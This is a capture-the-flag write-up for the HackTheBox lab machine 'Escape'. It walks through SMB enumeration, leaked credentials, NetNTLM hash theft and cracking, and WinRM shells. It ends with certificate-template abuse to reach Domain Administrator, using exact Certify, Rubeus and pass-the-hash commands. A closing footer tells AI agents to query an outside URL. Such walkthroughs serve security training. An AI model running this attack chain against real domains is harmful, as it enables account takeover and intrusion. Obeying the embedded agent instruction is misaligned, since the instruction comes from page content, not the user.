# Escape ## Inital recon ### nmap `nmap -sC -sV 10.10.11.202 -Pn` ``` PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-28 11:18:13Z) 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.sequel.htb | Not valid before: 2022-11-18T21:20:35 |_Not valid after: 2023-11-18T21:20:35 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.sequel.htb | Not valid before: 2022-11-18T21:20:35 |_Not valid after: 2023-11-18T21:20:35 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |_ms-sql-info: ERROR: Script execution failed (use -d to debug) |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2023-05-28T11:17:39 |_Not valid after: 2053-05-28T11:17:39 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.sequel.htb | Not valid before: 2022-11-18T21:20:35 |_Not valid after: 2023-11-18T21:20:35 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc.sequel.htb | Not valid before: 2022-11-18T21:20:35 |_Not valid after: 2023-11-18T21:20:35 |_ssl-date: 2023-05-28T11:18:58+00:00; +7h59m34s from scanner time. Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h59m33s, deviation: 0s, median: 7h59m33s ``` ### SMB Let's check if there's any guest or anonymous access to the smbshare: `smbmap -u "" -p "" -P 445 -H 10.10.11.202 && smbmap -u "guest" -p "" -P 445 -H 10.10.11.202` Here we can see that there is a read only disk called `Public`, using `smbclient --no-pass //10.10.11.202/Public` we can see a file called `SQL Server Procedures.pdf`, so let's download it using `smbget smb://10.10.11.202/Public -R`, and we get some guest credentials. ``` PublicUser:GuestUserCantWrite1 ``` Following [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#steal-netntlm-hash-relay-attack) we are able to steal a hash using msfconsole and responder and then crack the hash using johntheripper `john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt` for the user `sql_svc`. ``` sql_svc:REGGIE1234ronnie ``` ## User.txt Next we can use rpcclient to do some enumeration: `rpcclient -U sql_svc 10.10.11.202` ``` rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[Tom.Henn] rid:[0x44f] user:[Brandon.Brown] rid:[0x450] user:[Ryan.Cooper] rid:[0x451] user:[sql_svc] rid:[0x452] user:[James.Roberts] rid:[0x453] user:[Nicole.Thompson] rid:[0x454] ``` ``` rpcclient $> enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] ``` ``` rpcclient $> enumprivs found 35 privileges SeCreateTokenPrivilege 0:2 (0x0:0x2) SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3) SeLockMemoryPrivilege 0:4 (0x0:0x4) SeIncreaseQuotaPrivilege 0:5 (0x0:0x5) SeMachineAccountPrivilege 0:6 (0x0:0x6) SeTcbPrivilege 0:7 (0x0:0x7) SeSecurityPrivilege 0:8 (0x0:0x8) SeTakeOwnershipPrivilege 0:9 (0x0:0x9) SeLoadDriverPrivilege 0:10 (0x0:0xa) SeSystemProfilePrivilege 0:11 (0x0:0xb) SeSystemtimePrivilege 0:12 (0x0:0xc) SeProfileSingleProcessPrivilege 0:13 (0x0:0xd) SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe) SeCreatePagefilePrivilege 0:15 (0x0:0xf) SeCreatePermanentPrivilege 0:16 (0x0:0x10) SeBackupPrivilege 0:17 (0x0:0x11) SeRestorePrivilege 0:18 (0x0:0x12) SeShutdownPrivilege 0:19 (0x0:0x13) SeDebugPrivilege 0:20 (0x0:0x14) SeAuditPrivilege 0:21 (0x0:0x15) SeSystemEnvironmentPrivilege 0:22 (0x0:0x16) SeChangeNotifyPrivilege 0:23 (0x0:0x17) SeRemoteShutdownPrivilege 0:24 (0x0:0x18) SeUndockPrivilege 0:25 (0x0:0x19) SeSyncAgentPrivilege 0:26 (0x0:0x1a) SeEnableDelegationPrivilege 0:27 (0x0:0x1b) SeManageVolumePrivilege 0:28 (0x0:0x1c) SeImpersonatePrivilege 0:29 (0x0:0x1d) SeCreateGlobalPrivilege 0:30 (0x0:0x1e) SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f) SeRelabelPrivilege 0:32 (0x0:0x20) SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21) SeTimeZonePrivilege 0:34 (0x0:0x22) SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23) SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24) ``` Next, let's use evil-winrm for a shell: `evil-winrm -i 10.10.11.202 -u sql_svc -p 'REGGIE1234ronnie'` We can also upload and run winPEAS, but unfortunately nothing comes up. Further enumeration of the file system reveals that `C:\SQLserver\Logs` contains some credentials: ``` 2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8. 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. ``` So let's use those credentials with evil-winrm for another shell `evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'` `user.txt` can be found at `C:\Users\Ryan.Cooper\Desktop` ## Root.txt Let's upload Certify.exe to see if there is anything vulnerable certificate templates `./Certify.exe find /vulnerable /currentuser` ``` [!] Vulnerable Certificates Templates : CA Name : dc.sequel.htb\sequel-DC-CA Template Name : UserAuthentication Schema Version : 2 Validity Period : 10 years Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email Permissions Enrollment Permissions Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513 sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519 Object Control Permissions Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500 WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500 sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519 WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500 sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519 WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500 sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512 sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519 ``` [Following a guide on how to exploit this vulnerable template](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin) we can arrive at the following commands: 1. Run this on your target machine to get the certificate: `./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator` then copy the certificate to your attacking machine. 2. Run this on your attacking machine: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx` then upload `cert.pfx` to the target machine 3. Run this on the target machine: `./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials` then copy the NTLM hash 4. Run this on your attacking machine for a shell as Administrator: `evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE` `root.txt` can be found at `C:\Users\Administrator\Desktop` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.greatmoves.xyz/hackthebox/escape.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.